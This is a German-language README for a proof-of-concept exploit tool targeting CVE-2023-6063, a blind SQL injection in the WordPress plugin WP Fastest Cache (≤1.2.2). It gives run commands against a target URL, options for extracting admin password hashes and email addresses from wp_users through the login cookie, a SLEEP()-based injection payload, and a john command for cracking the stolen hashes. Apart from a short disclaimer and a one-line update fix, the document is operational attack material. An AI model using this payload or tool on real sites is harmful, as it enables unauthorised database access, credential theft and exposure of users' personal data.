
Ein Proof of Concept für CVE-2023-6063, eine zeitbasierte blinde SQL-Injection-Schwachstelle in WP Fastest Cache ≤1.2.2.
Ein Proof of Concept für CVE-2023-6063, eine zeitbasierte blinde SQL-Injection-Schwachstelle in WP Fastest Cache ≤1.2.2. Extrahiert gehashte Passwörter (user_pass) und E-Mails (user_email) aus der Tabelle wp_users durch Missbrauch des Cookies wordpress_logged_in.
Dieses Skript extrahiert:
Installiere die Abhängigkeiten (falls nicht installiert):
pip install -r requirements.txt
Einfache Verwendung:
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5
Alle Optionen:
-h, --help Zeigt diese Hilfemeldung an und beendet das Programm
-u URL, --url URL Vollständige URL zu WordPress zum Testen von CVE-2023-6063
--username USERNAME Definiere einen Benutzer, dessen Passwort-Hash extrahiert werden soll
-d DELAY, --delay DELAY
Zeit für die Antwort des Webservers (Standard: 5, Minimum: 2)
-H HASH, --hash HASH Hash zur Verifizierung gegen die wp_users-Tabelle; falls der Hash Sonderzeichen enthält, bitte einfache Anführungszeichen verwenden -> '<hash>'
--domain DOMAIN Name der Domäne für E-Mail-Validierung
-c COOKIE, --cookie COOKIE
Gib einen Cookie-Namen an, falls dieser in deinem Kontext abweicht
--status-code STATUS_CODE
Verwende einen bestimmten positiven Statuscode (Standard: 200)
--debug Mehr Ausführlichkeit
--just-hash Nur den gehashten Passwort extrahieren
--just-email Nur den E-Mail-Wert für einen Benutzer extrahieren
Dies ist eine Demo für den Admin-Benutzer
https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890
Wenn Passwort-Hashes durchsickern, verwende john oder hashcat zur Entschlüsselung mit dem PHPass-Algorithmus, falls das Passwort angreifbar ist.
Beispiel für John:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass
Das WP Fastest Cache Plugin (≤1.2.2) für WordPress ist anfällig für eine nicht authentifizierte bline SQL-Injection über das Cookie wordpress_logged_in. Angreifer können diese Schwachstelle ausnutzen, um sensible Daten (z. B. Passwort-Hashes, E-Mail-Adressen) aus der Tabelle wp_users zu extrahieren, indem sie zeitbasierte Verzögerungen (SLEEP()) in SQL-Abfragen verwenden.
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -
🚨 Haftungsausschluss: Verwende diese Informationen nur für ethische Sicherheitstests mit entsprechender Genehmigung. Unbefugte Ausnutzung ist illegal.
Aktualisiere WP Fastest Cache auf Version >1.2.2.